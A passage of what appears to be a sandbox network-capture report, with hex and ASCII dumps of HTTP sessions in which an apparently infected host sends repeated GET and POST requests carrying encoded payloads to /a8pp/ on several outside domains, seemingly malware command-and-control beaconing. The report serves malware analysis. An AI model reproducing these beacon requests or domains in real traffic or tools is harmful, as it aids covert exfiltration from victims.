                                        Jun 4, 2024 14:39:41.713388920 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20
                                        Data Ascii: .wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
                                        Jun 4, 2024 14:39:41.713407993 CEST1289INData Raw: 22 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 50 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 74 65 6d 70 6f 72 61 72 79 2d 65 72 72 6f 72 73 22 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 41 72 74 62 6f 61 72 64 47 72
                                        Data Ascii: " sketch:type="MSPage"> <g id="temporary-errors" sketch:type="MSArtboardGroup" transform="translate(-297.000000, -82.000000)"> <g id="well-be-back" sketch:type="MSLayerGroup" transform="translate(299.000000, 84.000000)">
                                        Jun 4, 2024 14:39:41.713426113 CEST1289INData Raw: 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 37 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72
                                        Data Ascii: 4065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M0.458340557,61.6156981 L-0.149164087,54.5929811 C-0.410879257,51.5696604 1.82454799,48.9049811 4.8
                                        Jun 4, 2024 14:39:41.713444948 CEST1289INData Raw: 3d 22 4d 32 30 35 2e 30 34 34 33 34 34 2c 34 33 2e 38 33 39 38 34 39 31 20 4c 34 2e 33 39 38 39 38 34 35 32 2c 36 31 2e 32 37 33 33 35 38 35 22 20 69 64 3d 22 46 69 6c 6c 2d 39 22 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 6b 65 74 63 68
                                        Data Ascii: ="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Stroke-10" stroke="#B4B5B4" stroke-width="2" stroke-linecap=
                                        Jun 4, 2024 14:39:41.713464022 CEST1289INData Raw: 2c 31 31 34 2e 39 34 35 39 36 32 20 36 36 2e 31 33 31 32 31 39 38 2c 31 31 34 2e 39 34 35 39 36 32 20 43 36 34 2e 34 36 32 36 31 36 31 2c 31 31 34 2e 39 34 35 39 36 32 20 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e
                                        Data Ascii: ,114.945962 66.1312198,114.945962 C64.4626161,114.945962 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539
                                        Jun 4, 2024 14:39:41.713481903 CEST1289INData Raw: 31 30 33 2e 30 34 30 31 35 31 20 39 30 2e 36 32 31 32 35 30 38 2c 31 31 32 2e 31 33 36 36 30 34 20 43 39 34 2e 38 34 33 32 37 32 34 2c 31 32 33 2e 30 30 32 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34
                                        Data Ascii: 103.040151 90.6212508,112.136604 C94.8432724,123.002491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.18596
                                        Jun 4, 2024 14:39:41.713500977 CEST1289INData Raw: 37 30 39 36 36 20 36 30 2e 35 33 32 31 34 32 34 2c 31 34 35 2e 37 37 33 35 30 39 20 36 31 2e 35 38 34 34 32 37 32 2c 31 34 35 2e 37 37 33 35 30 39 20 43 38 30 2e 31 33 30 39 34 37 34 2c 31 34 35 2e 37 37 33 35 30 39 20 38 38 2e 38 38 36 32 30 31
                                        Data Ascii: 70966 60.5321424,145.773509 61.5844272,145.773509 C80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330943 79.7465108,105.699396 76.9978235,105.699396 C73.9284334,105.699396 71.3377245,107.735094 71.3377245,107
                                        Jun 4, 2024 14:39:41.713515997 CEST288INData Raw: 34 39 32 33 2c 31 31 32 2e 39 33 34 37 31 37 20 34 33 2e 36 38 38 38 30 35 2c 31 31 32 2e 34 36 30 36 30 34 20 43 34 33 2e 35 36 36 37 36 31 36 2c 31 31 31 2e 39 38 31 37 33 36 20 34 33 2e 31 36 34 30 31 38 36 2c 31 31 31 2e 36 34 38 32 32 36 20
                                        Data Ascii: 4923,112.934717 43.688805,112.460604 C43.5667616,111.981736 43.1640186,111.648226 42.6622848,111.610868 C39.8105387,111.396226 39.4477988,108.080151 39.6457802,105.336 C40.3807523,95.1303396 49.5950248,84.8805283 56.3426656,83.9581132 C57.6525


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        81192.168.11.304987523.227.38.7480
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:44.071583986 CEST471OUTGET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:44.255162001 CEST1289INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=10, db;dur=2, asn;desc="60068", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="589x", requestID;desc="3aaba6a7-f224-49b9-bc39-7a807289a133-1717504784"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: 3aaba6a7-f224-49b9-bc39-7a807289a133-1717504784
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyavHzD%2F1OeN671BTfsYQlyZ9kKeTLKcczzAnz6%2BCZ79AshbEoI4wP%2FyRzM%2B6DvZ%2FNd6ugksBz6nAFwPKId5zydmR3bH2zgW4a2SSlL0fu1x%2BjfDk52wLmbdG1SsJk41lYFZjCoOAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-ne
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:39:44.255187988 CEST286INData Raw: 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 35 31 2e 39 39 39 38 30 37 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74
                                        Data Ascii: ","max_age":604800}Server-Timing: cfRequestDuration;dur=51.999807X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 88e7fcc4ecd
                                        Jun 4, 2024 14:39:44.255201101 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        82192.168.11.3049876217.70.184.5080
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:49.481605053 CEST763OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 52 6a 63 45 4c 79 41 46 2b 4b 32 55 47 62 30 72 33 44 41 4d 4d 32 50 56 35 36 32 63 4f 4d 63 55 5a 73 55 6f 2b 73 51 51 37 72 51 63 56 54 7a 30 75 6c 39 50 37 33 63 48 48 41 6f 56 48 72 46 54 79 49 43 52 47 63 59 68 66 76 67 4d 74 2f 63 4b 6d 50 75 32 71 57 33 56 71 34 73 71 50 38 4d 6f 49 76 43 75 31 6f 74 57 6f 48 79 43 46 6c 76 32 72 34 7a 56 34 36 39 74 39 75 51 76 49 35 6d 2b 66 36 50 34 4d 4e 73 6a 48 41 78 52 70 6f 56 74 78 72 4e 43 64 4e 77 61 52 68 64 4e 4b 2b 61 6b 4d 57 7a 56 34 51 51 31 2b 36 74 34 62 31 5a 4e 35 47 49 62 55 41 3d 3d
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGRjcELyAF+K2UGb0r3DAMM2PV562cOMcUZsUo+sQQ7rQcVTz0ul9P73cHHAoVHrFTyICRGcYhfvgMt/cKmPu2qW3Vq4sqP8MoIvCu1otWoHyCFlv2r4zV469t9uQvI5m+f6P4MNsjHAxRpoVtxrNCdNwaRhdNK+akMWzV4QQ1+6t4b1ZN5GIbUA==
                                        Jun 4, 2024 14:39:49.691998959 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        83192.168.11.3049877217.70.184.5080
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:52.231210947 CEST783OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 54 44 73 45 59 46 63 46 31 4b 32 62 4b 37 30 72 39 6a 41 41 4d 32 44 56 35 34 61 79 4a 2b 34 55 5a 4e 6b 6f 2f 74 51 51 38 72 51 63 48 7a 7a 74 6a 46 39 36 37 77 56 79 48 41 55 56 48 76 74 54 79 4a 79 52 48 72 4d 2b 65 2f 67 43 32 76 63 49 6f 76 75 32 71 57 33 56 71 34 35 78 50 38 55 6f 49 61 4b 75 31 4e 42 56 6c 6e 79 44 47 6c 76 32 39 49 7a 72 34 36 38 4f 39 71 59 46 49 36 4f 2b 66 2f 7a 34 4c 5a 77 6b 4a 77 78 54 33 59 55 31 30 65 52 48 46 5a 63 51 41 6a 74 64 43 4e 57 45 41 68 43 50 6c 54 6b 33 74 61 52 56 48 30 30 6c 37 45 4a 41 4a 42 52 4a 2b 43 30 58 58 62 39 51 74 36 61 4c 51 6d 65 67 42 74 59 3d
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGTDsEYFcF1K2bK70r9jAAM2DV54ayJ+4UZNko/tQQ8rQcHzztjF967wVyHAUVHvtTyJyRHrM+e/gC2vcIovu2qW3Vq45xP8UoIaKu1NBVlnyDGlv29Izr468O9qYFI6O+f/z4LZwkJwxT3YU10eRHFZcQAjtdCNWEAhCPlTk3taRVH00l7EJAJBRJ+C0XXb9Qt6aLQmegBtY=
                                        Jun 4, 2024 14:39:52.443501949 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        84192.168.11.3049878217.70.184.5080
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:54.977902889 CEST1700OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 6f 64 58 6a 32 73 56 2f 61 54 47 54 44 73 45 59 46 63 46 31 4b 32 62 4b 37 30 72 39 6a 41 41 4d 32 44 56 35 34 61 79 4a 2b 77 55 5a 65 38 6f 2f 4f 34 51 39 72 51 63 45 7a 7a 6f 6a 46 39 6e 37 32 39 32 48 41 59 2f 48 70 70 54 78 76 4f 52 50 2b 77 2b 52 2f 67 43 70 2f 63 4c 6d 50 75 6a 71 53 53 63 71 34 70 78 50 38 55 6f 49 62 36 75 38 34 74 56 32 58 79 43 46 6c 76 71 72 34 7a 51 34 37 56 31 39 71 55 2f 4c 4c 75 2b 66 66 44 34 4f 73 73 6b 50 67 78 56 32 59 55 6d 30 65 55 58 46 64 45 6d 41 67 78 7a 43 50 47 45 57 45 66 78 77 69 67 32 78 59 70 65 47 41 4d 34 79 46 52 65 4f 68 74 69 2f 69 78 70 51 66 31 73 70 36 65 42 56 79 69 36 44 5a 78 70 54 77 54 65 77 76 59 56 34 79 31 59 67 61 61 6b 66 45 7a 2f 45 44 64 68 58 38 6c 35 58 38 78 62 39 61 2f 66 52 54 6d 35 7a 30 78 65 49 35 50 43 4a 36 50 46 53 38 6a 7a 36 4a 47 46 68 4d 75 68 52 71 50 34 6e 7a 33 47 5a 66 77 76 6e 44 66 51 36 44 76 50 6f 66 6f 33 5a 34 4e 4e 4a 54 6f 56 49 70 74 49 31 51 4b 4a 49 2f 73 62 41 55 53 37 4d [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGTDsEYFcF1K2bK70r9jAAM2DV54ayJ+wUZe8o/O4Q9rQcEzzojF9n7292HAY/HppTxvORP+w+R/gCp/cLmPujqSScq4pxP8UoIb6u84tV2XyCFlvqr4zQ47V19qU/LLu+ffD4OsskPgxV2YUm0eUXFdEmAgxzCPGEWEfxwig2xYpeGAM4yFReOhti/ixpQf1sp6eBVyi6DZxpTwTewvYV4y1YgaakfEz/EDdhX8l5X8xb9a/fRTm5z0xeI5PCJ6PFS8jz6JGFhMuhRqP4nz3GZfwvnDfQ6DvPofo3Z4NNJToVIptI1QKJI/sbAUS7MArae9+nej7t8IkLLtU1vNowwlJqOrJ2KprFBzXDL5yNJiOzodI5KD+s1zJXjMwRenMjqANvWw9hi0FQd2WiYosgUu+2912C4o8MP3F7lrE4z1EaOCoyffL3Hp/pg20WzKiSCtkiKuGbBeHEw9hJPmaC3i245wY5pUHYUEYqbmtN/VH9IW4fgO4evZ5TavMxkWlgcKPS9IO+KQsOE3EpamiHuyiWJX9tTy+K4CSDd9StuMUVDkWx+5v3LvcLzCocOF+PkSU+/ftapLYFudEGUemZUQPiu5YiLuJ7dnFtUUeycailFlUmleB6YG5RxB/knFiWy9KNJXEX8dvote/x28Pw+NYEGkVkEph0U3KtpUnvwPoPl/PO2GTQcVwzxamyIS/3VQ8QYwo5L+dM+l33rq2XnAXpbI95dxHccDWeIfqU4X2XUP037AHraqxUHKUnV9nK8bVADbAfA3uVscFrQf8ySJWzMF60Nh7aGjPgsXEdBlqBZ8ZWVfYI+stJDYgRLzBmJy5i/Y1h3q0yMaVIBrRKWbjMDu/rEMyzJYguJNO3enR1kVVHCwZiXetqbyvetqgX7fQPU2SqzIU2FT6exUXSkiwGNw6+xuYpMBRNN0IRLAkfm8Ejin24tcRrPgkEf3dTRX18GfTyH3XbZhcdMruPJVIrjZ/4si4 [TRUNCATED]
                                        Jun 4, 2024 14:39:55.190674067 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        85192.168.11.3049879217.70.184.5080
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:57.709409952 CEST476OUTGET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:57.920452118 CEST1289INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:57 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Raw: 37 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 [TRUNCATED]
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:39:57.920466900 CEST886INData Raw: 72 65 73 75 6c 74 73 20 6f 66 20 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:39:57.920483112 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        86192.168.11.3049880192.207.62.2180
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:40:35.854449987 CEST730OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
